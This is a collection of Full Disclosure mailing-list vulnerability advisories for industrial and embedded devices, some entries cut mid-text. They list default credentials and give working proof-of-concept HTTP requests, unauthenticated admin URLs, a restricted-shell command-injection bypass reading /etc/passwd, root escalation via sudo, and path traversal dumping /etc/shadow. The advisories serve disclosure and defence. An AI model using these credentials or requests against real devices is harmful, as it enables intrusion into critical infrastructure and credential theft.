An unauthorized user can access the device management portal and make
config changes. This can further be exploited easily at a mass scale, with
scripting, and submitting device configuration changes via a specific POST
request.

I suspect it may also be possible to cause denial of service to these
devices, as well as additional devices - which directly or indirectly
accept / send data to/from these meters - by submitting varying amounts of
invalid / junk data.

*Vulnerable to Cross-Site Request Forgery *

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as configuration
parameter changes, and saving modified configuration.

Successful exploitation of these vulnerabilities allow silent execution of
unauthorized actions on the device specifically modifying parameter
configurations – voltage modes, polarity, voltage units, current units,
interval values -, and submitting configuration changes to meter.

*Front Panel security (Physical) *

*Weak Credential Management* – Default meter password is factory-set to
0 – mandatory default password change is not enforced.

Front panel meter security lets you configure the meter through the front
panel using a meter password.

Front panel meter security is enabled by default on all ION7300 series
meters; all configuration functions in the front panel are
password‐protected.

The password is factory‐set to 0 (zero).

*Telnet *


*Weak Credentials Management *
- *Default accounts* - different models come with corresponding login creds
- documented in the powerlogic admin guide -
http://www.powerlogic.com/literature/70072-0102-05.pdf
- Application does not enforce a mandatory default password change

For example, for ION7300, default creds are:
User - 7300
Password – 0 (<— zero)

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CIMA DocuClass ECM - Multiple Vulnerabilities

[Karn Ganeshen]

*CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities*

DocuClass is a modular and scalable enterprise content management (ECM)
solution that allows organizations to streamline internal operations by
significantly improving the way they manage their information within a
business process.


*Vendor Response*: None


*Vulnerability Findings*

1. *SQL Injection* [Post Auth]


DocuClass web application contains a SQL injection vulnerability.


CWE-89: Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection')


DocuClass web application contains a SQL injection vulnerability due to the
application failing to validate user input. Multiple parameters are
vulnerable.


*Vulnerable URLs & parameters:*

A. POST request - /dcrpcserver.php [parameter - uid]

B. GET request -

/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755

[parameter - userid]


*Impact*

An unauthenticated attacker can read or modify data in the application
database, execute code, and compromise the host system.


2. *Access Control Flaws*


DocuClass web application does not enforce strict access control.


*Impact*

An unauthenticated user can access stored documents by directly calling the
document url.


PoC:

http://IP/medical_records/001337/00123456.pdf


3. *Cross-Site Scripting*


DocuClass web application lacks strong input validation, and multiple urls
& parameters are vulnerable to cross-site scripting (CWE-79) attacks.


*Impact*

An attacker may be able to execute arbitrary scripts/code in the context of
the user's browser.


4. *Vulnerable to Cross-Site Request Forgery*


The application does not have a CSRF Token generated per page and / or per
(sensitive) function.


*Impact*

Successful exploitation of this vulnerability can allow silent execution of
unauthorized actions in the application such as configuration changes,
(potentially) deleting stored documents, running reports, changing
passwords, filling disk space via repeated duplicate copying of documents,
etc.

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] RS232-NET Converter (JTC-200) - Multiple vulnerabilities

[Karn Ganeshen]

*RS232-NET Converter (JTC-200) - Multiple vulnerabilities*

About RS232-NET Converter (model JTC-200)
http://www.jantek.com.tw/en/product/73

*Seen deployed in:*
CHTD, Chunghwa Telecom Co., Ltd. (Taiwan)
HiNet (Taiwan & China)
PT Comunicacoes (Portugal)
Sony Network Taiwan Limited (Taiwan)
Vodafone Portugal (Portugal)

*1. Weak Credential Management*
The RS232-NET Converter (model JTC-200) web administration interface uses
non-random default credentials of admin:1234. The application does not
enforce a mandatory password change. A network-based attacker can gain
privileged access to a vulnerable device's web management interfaces or
leverage default credentials in remote attacks such as cross-site request
forgery.

*2. Unauthenticated access over Telnet (**Backdoor shell possibly**)*
The RS232-NET Converter (model JTC-200) provides (undocumented) Busybox
linux shell over Telnet service - without any authentication. This backdoor
shell therefore (apparently) allows access in to the internal network, over
the Internet.

Trying IP...
Connected to IP.
Escape character is '^]'.

BusyBox v0.60.4 (2008.02.21-16:59+) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

BusyBox v0.60.4 (2008.02.21-16:59+) multi-call binary
Usage: busybox [function] [arguments]...
or: [function] [arguments]...

BusyBox is a multi-call binary that combines many common Unix  utilities
into a single executable. Most people will create a link to busybox for
each function they wish to use, and BusyBox will act like whatever it was
invoked as.

Currently defined functions:
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls,
mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi

#

# ls
bin dev etc nfs proc swap usb var
# cd etc
# ls
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc
resolv.conf services

# cat inetd.conf
telnet stream tcpnowait root /bin/telnetd
#

Busybox shell offers pretty restricted set of allowed functions but it is
still possible to perform enumeration.

192.168.5.x -> real IP

# for i in `cat ip-list`; do ping 192.168.5.$i; done
192.168.5.11 is alive!
No response from 192.168.5.12
No response from 192.168.5.13
192.168.5.14 is alive!
192.168.5.15 is alive!
#

*3. Cross-Site Request Forgery (CSRF)*
The RS232-NET Converter (model JTC-200) contains a global CSRF
vulnerability. An attacker can perform actions with the same permissions as
a victim user, provided the victim has an active session and is induced to
trigger the malicious request. Note that in combination with default
credentials, an attacker can establish an active session as part of an
attack and therefore would not require a victim to be logged in.

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] EdgeCore - ES3526XA Manager - Multiple Vulnerabilities

[Karn Ganeshen]

*EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager -
Multiple Vulnerabilities*
Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager*

Object ID:
1.3.6.1.4.1.259.8.1.5

Switch Information

Main Board:
Number of Ports 26
Hardware Version R01
Management Software:
Loader Version 1.0.0.2
Boot-ROM Version 1.0.0.5
Operation Code Version 1.28.16.14

Object ID:
1.3.6.1.4.1.202.20.66

Switch Information

Main Board:
Number of Ports 28
Hardware Version R01
Chip Device ID Marvell 98DX106-B0, 88E6095[F]
Internal Power Status Active

Management Software:
EPLD Version 0.07
Loader Version 1.0.2.0
Boot-ROM Version 1.2.0.1
Operation Code Version 1.4.18.2
Role Master

Other firmware / software versions may also be affected.

*Vendor Response*: These models are no longer supported.

*Vulnerability Details*

*1. Weak Credentials Management *

Guest / guest – priv 0 - read privileges to most device configuration
Admin/admin – priv 15 - read/write access

*Issue:*
Mandatory password change not enforced by the application.

*2. Access Control Flaws*

Any functions can be performed by directly calling the function URL
(GET/POST) without any authentication. This includes creating new
privileged user(s), changing (admin) passwords, deleting user(s),
reading/changing device configuration, rebooting device etc.

+ Guest can also perform any administrative functions such as
add,update,delete users

*PoC 1:*
For example, anyone can access these urls directly, without any
authentication:

http://IP/config/153/sysinfo.htm?unit=1
http://IP/config/153/port_config.htm?unit=
http://IP/home/153/active_panel_bid0.htm?unit=1
http://IP/config/upnp_config.htm
http://IP/config/153/user_accounts.htm

*PoC 2:*
Create a new privileged account:

POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166

page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm=

*Issue:*
Application does not enforce access control correctly.

*3. Vulnerable to Cross-Site Request Forgery *

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, saving modified configuration, & device
reboot.

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Sierra Wireless AirLink Raven XE Industrial 3G Gateway - Multiple Vulnerabilities

[Karn Ganeshen]

ongly recommends that best practices be followed and the Ace
Manager interface be disabled on the cellular WAN connection, particularly
when the device is active on public networks in order to prevent
exploitation of this sensitive information by internet-based attackers.

+

*4. Unauthenticated access to directories + Arbitrary File Upload *

Following directories can be accessed without any authentication:
http://IP/admin/AceManager.htm?hwstr=
http://IP:9191/admin/UpLoadTemp.htm
http://IP:9191/admin/UpLoad.htm

With access to ACEManager GUI */admin/UpLoadTemp.htm*, everyone gets access
to following options:

-> Upload, Download, Refresh options, Reboot option is also offered now.

There is also Logout option on this screen pointing that we are logged in.
No other function is shown. Anyone can potentially be able to reboot the
box. No authentication is needed.

Moving ahead.

When we make a request to http://IP:9191/admin/AceManager.htm, there are 3
GET requests made by the application:

http://IP:9191/admin/AceManager.htm
http://IP:9191/admin/UpLoadTemp.htm
http://IP:9191/admin/AceManager.htm

When we look at http://IP:9191/admin/UpLoadTemp.htm, there is no
authentication on this page, and we find it offers an option to upload a
template file, with three options -
a. Load to screen
b. Preview
c. Load & Apply

It may be possible to load a template that when loaded, modifies the
configuration and makes the device unavailable for access & usability.

Looking at the page source of /admin/UpLoadTemp.html, we find that
templates are uploaded to /Upload.

When we access http://IP:9191/admin/UpLoad.htm, there is no auth (again) on
this page, and it gives few more options and information.

a. Any unauthenticated user can upload any file to the device
b. Arbitrary files can be uploaded via the upload form. Files get uploaded
to /
c. Uploaded files can be accessed at: http://IP/

*Affected devices: *

All Raven XE/XT models

*Comment from the vendor*: Sierra Wireless acknowledges in versions of
ALEOS compatible with the end of life Raven XE/XT family. It does not exist
in current ALEOS products. As previously noted there will be no firmware
updates to address this issue on the Raven XE/XT. Sierra Wireless strongly
recommends that the AceManager interface be disabled on the cellular WAN
connection, particularly when the device is active on public networks in
order to prevent exploitation of this sensitive information by
internet-based attackers.

+++++
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Papouch TME Temperature & Humidity Thermometers - Multiple Vulnerabilities

[Karn Ganeshen]

+
*Vulnerable Products*
1. Papouch TME Ethernet thermometer
2. Papouch TME multi: Temperature and humidity via Ethernet

*All versions affected*

*TME - Ethernet Thermometer*
http://www.papouch.com/en/shop/product/tme-ip-ethernet-thermometer/

*TME multi: Temperature and humidity via Ethernet*
http://www.papouch.com/en/shop/product/tme-multi-temperature-humidity-via-ethernet/


*Vulnerability Details*

*1. Weak Credentials Management*

Device have three security levels – user (temperature viewing) and
administrator (configuration), superadmin (sensor calibration). Each level
has own password.

*Issue*
According to device manual, Superadmin password cannot be cleared. The
default password is 1234. This level allows you to access all settings
including sensor calibration.

-> The application does not allow/enforce a mandatory, password change from
default to strong password values.


*2. Authentication Issues & Sensitive Information Leakage*

By default, password authentication is not enabled on Telnet access. Telnet
service runs on TCP . Telnet to t drops in setup mode and gives
access to device configuration.

Configuration reveals administrative password in clear-text without any
authentication. Anyone can then use this password to gain administrative
access to the device.

-> Telnet access must have authentication enabled by default, a mandatory
password change must be enforced, and any login passwords and SNMP
community strings must be hidden/masked/censured.

*3. Vulnerable to Cross-Site Request Forgery*

In Device Management portal, there is no CSRF Token generated per page and
/ or per (sensitive) function. Successful exploitation of this
vulnerability can allow silent execution of unauthorized actions on the
device such as configuration parameter changes, and saving modified
configuration.

*Overall Impact*
AFAIK, these products are typically used for monitoring temperatures in
Data Center, Fuel Tanks, Heating system monitoring, AC failure monitoring,
or performing Food / grain storage temperature monitoring etc. Therefore,
impact due to device compromise can be severe depending upon the utility &
environment where they are deployed.

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] HP StoreEver MSL6480 Tape Library v4.10 - Multiple Vulnerabilities

[Karn Ganeshen]

*HP StoreEver MSL6480 Tape Library v4.10 - Multiple Vulnerabilities*

*Confirmed on firmware version 4.10*

*HPE PSRT response*: Upgrade to MSL6480 is 4.90 (current version)


*Weak Credentials Management*

The device comes with weak, default login credentials - security/security -
and the application does not enforce a mandatory, password change from
default to strong password values.


*Access Control Issues*

An unauthenticated user can download system configuration archive. Archive
Filename can be guessed with a bit of scripting.

Filename format is as follows:

/syslog-MSL6480-A60A80---MM-DD_HH-MM-SS-SSS_.zip

For example, anyone can download the config by requesting the url:

http://IP/tmp/syslog-MSL6480-A60A80-4.10-2016-06-15_01-01-01-001_PM.zip


*Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability may allow silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, generating system configuration archive,
saving modified configuration, & device reboot.


+


-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] Meteocontrol WEB’log Multiple Vulnerabilities

[Karn Ganeshen]

[ICS] Meteocontrol WEB’log Multiple Vulnerabilities

*About MeteoControl WEB’log*

Meteocontrol is a Germany-based company that maintains offices in several
countries around the world, including the US, China, Italy, Spain, France,
Switzerland, and Israel.

The affected products, WEB’log, are web-based SCADA systems that provide
functions to manage energy and power configurations in different connected
(energy/industrial) devices.

According to Meteocontrol, WEB’log is deployed across several sectors
including Commercial Facilities, Critical Manufacturing, Energy, and Water
and Wastewater Systems. Meteocontrol estimates that these products are used
primarily in Europe with a small percentage in the United States.

*Product details here:*
http://www.meteocontrol.com/en/industrial-line/data-logger-weblogs/weblog/

*Multiple versions of this application are offered:*
WEB'log Basic 100
WEB'log Light
WEB'log Pro
WEB'log Pro Unlimited

All Meteocontrol’s WEB’log versions / flavors have the same underlying
design and are vulnerable.

This product is deployed primarily in Power & Energy domain, and is used
worldwide. It is rebranded in different countries, a few that I came across
are as follows:

   - WEB’log Pro (branded by Siemens) - US
   - Powador-proLOG (branded by KACO new energy) - Germany
   - Aurora Easy Control / Aurora Easy Control Basic (both branded by power
   one) - Italy
   - Data Control Pro (branded by Mastervolt) - France


+
*Weak Credential Management*

Default Login password is ist02
-> gives easy administrative access to anyone

Issue:
Mandatory password change is not enforced by the application.

*Access Control Flaws*
CVE-2016-2296

All pages, functions, and data, can still be accessed without
administrative log in. This can be achieved by directly accessing the URLs.

This includes access to configuration pages, ability to change plant data,
configured modbus/inverter devices, configuration parameters, and even
rebooting the device.

For example:
Making the following direct request, dumps the source code of page that
contains administrator password-
http://IP/html/en/confAccessProt.html

Modbus related configuration can be dumped by calling the following url:
http://IP/html/en/confUnvModbus.html

Access modbus devices
http://IP/html/en/ajax/viewunvmodbus.xml

Similarly, certain POST requests can be used to Modify Plant Configuration
Data, without any authentication.

Issue:
Access control is not enforced correctly.

*Sensitive information exposure*
CVE-2016-2298

As noted above, Administrator password is stored in clear-text. So anyone
can make a request to this page and get the clear-text Administrative
password for the application, and gain privileged access.

Issue:
Password is stored in clear-text.

*Hidden/Obscured CMD shell*
CVE-2016-2297

Another interesting feature is presence of a CMD shell. Meteocontrol
WEB'log management application offers a CMD shell which allows running a
restricted set of commands that gives host, application and stats data.

And as like other functions, it can be accessed directly without any
authentication -
http://IP/html/en/xprtCmd.html

Assuming no one will be able to figure out a technique to exploit this
feature, is not a great idea.

*No CSRF protection - Vulnerable to CSRF attacks*
There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as modifying plant
data, modifying modbus/inverter/any other PLC devices, changing
Administrator password, changing configuration parameters, saving modified
configuration, & device reboot.

+

ICS-CERT published Meteocontrol advisory at:
https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01

Note that it is not complete and accurate. I have already sent my comments
to ICS-CERT team to correct their report. Hopefully they will update it
soon.

+++++

Cheers!
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Moxa MiiNePort - Multiple Vulnerabilities

[Karn Ganeshen]

*Moxa MiiNePort - Multiple Vulnerabilities*


Multiple vulnerabilities are present in Moxa MiiNePort. Following versions
have been verified, but it is highly probable all other versions are
affected as well.


*About*


Moxa provides a full spectrum of quality products for industrial
networking, computing, and automation, and maintains a distribution and
service network that reaches customers in more than 70 countries. Our
products have connected over 30 million devices worldwide in a wide range
of applications, including factory automation, smart rail, smart grid,
intelligent transportation, oil & gas, marine, and mining. By continually
improving staff expertise in a variety of technologies and markets, we aim
to be the first choice for industrial automation solutions.


Moxa's embedded serial-to-Ethernet device server modules are small, consume
less power, and integration is easy.

The embedded serial-to-Ethernet device servers modules consist of the
MiiNePort serial device server series and the NE device server module
series.


Moxa’s MiiNePort E3 series embedded device servers are designed for
manufacturers who want to add sophisticated network connectivity to their
serial devices with minimal integration effort. The MiiNePort E3 is
empowered by the MiiNe, Moxa’s second generation SoC, which supports 10/100
Mbps Ethernet, up to 921.6 kbps serial baudrate, a versatile selection of
ready-to-use operation modes, and requires only a small amount of power. By
using Moxa’s innovative NetEZ technology, the MiiNePort E3 can be used to
convert any device with a standard serial interface to an Ethernet enabled
device in no time. In addition, the MiiNePort E3 is a compact embedded
device server with an RJ45 connector, making it easy to fit into virtually
any existing serial device.


http://www.moxa.com/product/MiiNePort_E1.htm

http://www.moxa.com/product/MiiNePort_E2.htm

http://www.moxa.com/product/MiiNePort_E3.htm



*Confirmed Device Models + Firmware versions*
Device name MiiNePort_E1_7080
Firmware version 1.1.10 Build 09120714

Device name MiiNePort_E1_4641
Firmware version 1.1.10 Build 09120714

Device name MiiNePort_E2_1242
Firmware version 1.1 Build 10080614

Device name : MiiNePort_E2_4561
Firmware version : 1.1 Build 10080614

Model name MiiNePort E3
Firmware version 1.0 Build 11071409


*Vulnerability Summary*

1. Weak Credentials Management - CVE-2016-2286

2. Sensitive information not protected - CVE-2016-2295

3. Vulnerable to Cross-Site Request Forgery - CVE-2016-2285


*Vulnerability Description*


1. *Weak Credentials Management*

By default, no password is set on the device / application. The device /
application does not enforce a mandatory password change mechanism, forcing
users to a) set/change the password on first login, b) ensure the password
meets complexity requirements, and c) change password periodically.

This allows anyone to access the device over HTTP and Telnet. Access to the
device provides full administrative functionality.

2. *Sensitive information not protected*

Information such as Connect passwords, SNMP community strings is not
protected and shown in clear-text when viewing and / or downloaded device
config (HTTP / Telnet).


3. Vulnerable to Cross-Site Request Forgery

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability allows silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, saving modified configuration, & device
reboot.

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Schneider Electric Building Operation Automation Server Multiple Vulnerabilities

[Karn Ganeshen]

*Schneider Electric Building Operation Automation Server Multiple
Vulnerabilities*

*Reported affected version:*
Schneider Electric Building Operation Automation Server
Firmware: Server 1.6.1.5000
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212

*Reported on: *August 2015
*Schneider Electric fix & public disclosure:*
Feb 25, 2016
*URL:*
http://oreo.schneider-electric.com/flipFlop/1739415603/index.htm?p_EnDocType=Technical%20leaflet&p_Reference=SEVD-2016-025-01&p_File_Name=SEVD-2016-025-01%20SBO%20AS.pdf&flipflop=1#/2

*Confirmed affected versions: *
Automation Server Series (AS, AS-P), v1.7 and prior

*Public Disclosure:*
March 01, 2016

*Vulnerabilities*
*1. Weak credential management*
*CVE-ID:* None *[ Mitre, CVE? ]*

There are two primary users:
a. root - password is not set by default - this is a problem as we will see
later in the vuln findings
- By default, root cannot SSH in.
b. admin - default password is 'admin'
- Anyone can remotely ssh in to the device using default admin/admin login.

The system / application allows a) weak creds to start with, and more
importantly, b) vulnerable versions lacks the mechanism to forcefully have
the user change the initial password on first use or later. This has been
fixed in the latest version.

*2. OS Command Injection*

After logging in to the device over SSH, the 'admin' user - the only
active, administrative user at this point - is provided a restricted shell
(msh), which offers a small set of, application- specific functional
options.

$ ssh  -l admin Password:

Welcome! (use 'help' to list commands) admin@box:>

admin@box:> release
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212

admin@box:>

admin@box:> help
usage: help [command]
Type 'help [command]' for help on a specific command.

Available commands:
exit - exit this session
ps - report a snapshot of the current processes readlog - read log files
reboot - reboot the system
setip - configure the network interface
setlog - configure the logging
setsnmp - configure the snmp service
setsecurity - configure the security
settime - configure the system time
top - display Linux tasks
uptime - tell how long the system has been running release - tell the os
release details

Attempting to run any different command will give an error message.

However, this restricted shell functionality (msh) can be bypassed to
execute underlying system commands, by appending '| ' to any of
the above set of commands:

admin@box:> uptime | ls
bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr
etc localization proc share var

admin@box:> uptime | cat /etc/passwd

root:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false
messagebus:x:3:3:messagebus:/sbin:/bin/false
ntp:x:102:102:ntp:/var/empty/ntp:/bin/false
sshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux
Application:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh

admin@box:> uptime | cat /etc/group root:x:0:
wheel:x:1:admin
daemon:x:2:
messagebus:x:3:
adm:x:5:admin
power:x:20:app
serial:x:21:app
cio:x:22:app
lon:x:23:app
daemonsv:x:30:admin,app
utmp:x:100:
lock:x:101:
ntp:x:102:
sshd:x:103:
app:x:500:admin
admin:x:1000:admin

*3. Privilege Escalation / access to root*
*CVE-ID:* None *[ Mitre, CVE? ]*

Since this is an administrative user, an attacker can exploit OS command
injection to perform a variety of tasks from msh shell. But isn’t it better
to get a root shell instead.!

As observed from Issue 1 above, root does not have a password set, and it
is possible to use 'sudo -i' and become root.
Note: sudo is not presented / offered to 'admin' in the set of functional
options available thru msh.

admin@box:> *sudo -i*

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

*root@box:~> *cat /etc/shadow
root:!:16650:0:9:7:::
sshd:!:1:0:9:7:::
admin:$6$:16652:0:9:7:::

+

The Automation Server (AS) is one functional component of the larger,
StruxureWare Building Operation platform (SBO) solution / environment. The
AS password gets sync’d to SBO application rbac. With the new release, the
default AS password will be forcefully changed, and msh has been
sufficiently improved to mitigate against command injection.

Issue 3, however, persists. Anyone with access to msh shell, can still drop
in to root shell, and have some fun.

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WAGO IO PLC 758-870, 750-849, 750-849 vulnerabilities

[Karn Ganeshen]

  12 Oct  1  2010 mtab -> /proc/mounts
drwxrwxrwx6 001024 Feb 24 18:22 network
-rw-r--r--1 001181 Oct  1  2010 nsswitch.conf
-rw-r--r--1 00  40 Oct  1  2010 partitions
-rw-r--r--1 00 459 Oct  1  2010 passwd
drwxr-xr-x2 001024 Oct  1  2010 php5
--x---1 00  53 Mar  3 14:40 pointercal
-rw-r--r--1 00 536 Oct  1  2010 profile
-rw-r--r--1 00 178 Oct  1  2010 protocols
-rw-r--r--1 00   8 Jun  7  2010 pure-ftpd.conf
drwxrwxrwx2 001024 Oct  1  2010 rc.d
-rw-rw-rw-1 00  53 Oct  1  2010 resolv.conf
-rw-r--r--1 00  14 Oct  1  2010 rootpartition
-rw-rw-rw-1 00 341 Mar  2 17:08 rts3s.cfg
-rwxr-xr-x1 003012 Jun  7  2010 screenrc
-rw-r--r--1 009590 Oct  1  2010 services
-rw-r-1 00 338 Oct  1  2010 shadow
-rw---1 00 280 Oct  1  2010 shadow-
-r--r-1 001712 Jun  7  2010 sudoers
-rwxrwxrwx1 00  25 Jun  7  2010 timezone
-rwxr-xr-x1 00 511 Mar  3 14:37 ts.conf
drwxr-xr-x3 001024 Oct  1  2010 udev
-rwxr-xr--1 00 798 Oct  1  2010 udhcpc.script
-rw-r--r--1 00 357 Jun 15 21:42 webserver_conf.xml

226-Options: -l
226 45 matches total

Note: As seen above, access permissions are too open on multiple files and
directories.

ftp> get /etc/shadow
local: /etc/shadow remote: /etc/shadow
ftp: Can't access `/etc/shadow': Permission denied

ftp> get /etc/passwd
local: /etc/passwd remote: /etc/passwd
*ftp: Can't access `/etc/passwd': Permission denied*

ftp> get /etc/webserver_conf.xml
local: /etc/webserver_conf.xml remote: /etc/webserver_conf.xml
ftp: Can't access `/etc/webserver_conf.xml': Permission denied

ftp> get /etc/pure-ftpd.conf
local: /etc/pure-ftpd.conf remote: /etc/pure-ftpd.conf
ftp: Can't access `/etc/pure-ftpd.conf': Permission denied

*ftp> cd /etc/lighttpd  <— drwxr-xr-x*
250 OK. Current directory is /etc/lighttpd
ftp> ls
229 Extended Passive mode OK (|||10281|)
150 Accepted data connection
-rw-r--r--1 12   10265 Jun  7  2010
lighttpd-htpasswd.user
-rw-r--r--1 12   102  3743 Jun 15 21:42 lighttpd.conf
-rw-r--r--1 12   102   414 Jun  7  2010 mod_fastcgi.conf

226-Options: -l
226 3 matches total

ftp> get lighttpd-htpasswd.user

local: lighttpd-htpasswd.user remote: lighttpd-htpasswd.user
229 Extended Passive mode OK (|||52622|)
150 Accepted data connection
100%
|***|
   65  484.55 KiB/s00:00 ETA

226-File successfully transferred
226 0.001 seconds (measured here), 71.89 Kbytes per second
65 bytes received in 00:00 (3.14 KiB/s)
ftp>
ftp> get lighttpd.conf
local: lighttpd.conf remote: lighttpd.conf
229 Extended Passive mode OK (|||9954|)
150 Accepted data connection
100%
|***|
 3743  243.10 KiB/s00:00 ETA

226-File successfully transferred
226 0.015 seconds (measured here), 249.64 Kbytes per second
3743 bytes received in 00:00 (160.62 KiB/s)
…..
*Note*: Above configuration files contain credentials.

Once in this directory, we can now also access /etc/passwd file

*ftp> get /etc/passwd*
local: /etc/passwd remote: /etc/passwd
229 Extended Passive mode OK (|||1859|)
150 Accepted data connection
100%
|***|
  4593.77 MiB/s00:00 ETA
*226-File successfully transferred*
226 0.003 seconds (measured here), 143.76 Kbytes per second
459 bytes received in 00:00 (35.35 KiB/s)

+

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DLink DVG­N5402SP Multiple Vulnerabilities

[Karn Ganeshen]

 DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities

*Timelines*
Reported to CERT + Vendor: August 2015
Dlink released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) =
04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - Dlink waiting for Service providers to ask
for new release + CERT opted out


*Vulnerable Models, Firmware, Hardware versions*
DVG­N5402SP Web Management
Model Name : GPN2.4P21­C­CN
Firmware Version : W1000CN­00
Firmware Version :W1000CN­03
Firmware Version :W2000EN­00
Hardware Platform :ZS
Hardware Version :Gpn2.4P21­C_WIFI­V0.05

Device can be managed through three users:
1. super ­ full privileges
2. admin ­ full privileges
3. support ­ restricted user

*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245

*HTTP Request *

POST /cgi­bin/webproc HTTP/1.1
Host: :8080
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
Firefox/39.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: http://:8080/cgi­bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 223

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
&obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh


*HTTP Response*

HTTP/1.0 200 OK
pstVal­>name:getpage; pstVal­>value:html/main.html
pstVal­>name:getpage; pstVal­>value:html/index.html
pstVal­>name:errorpage;
pstVal­>value:../../../../../../../../../../../etc/shadow
pstVal­>name:var:menu; pstVal­>value:setup
pstVal­>name:var:page; pstVal­>value:connected
pstVal­>name:var:subpage; pstVal­>value:­
pstVal­>name:obj­action; pstVal­>value:auth
pstVal­>name::username; pstVal­>value:super
pstVal­>name::password; pstVal­>value:super
pstVal­>name::action; pstVal­>value:login
pstVal­>name::sessionid; pstVal­>value:1ac5da6b
Connection: close
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­ 23:59:59 GMT;
path=/

#root::13796:0:9:7:::
root::13796:0:9:7:::
#tw::13796:0:9:7:::
#tw::13796:0:9:7:::


*2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246

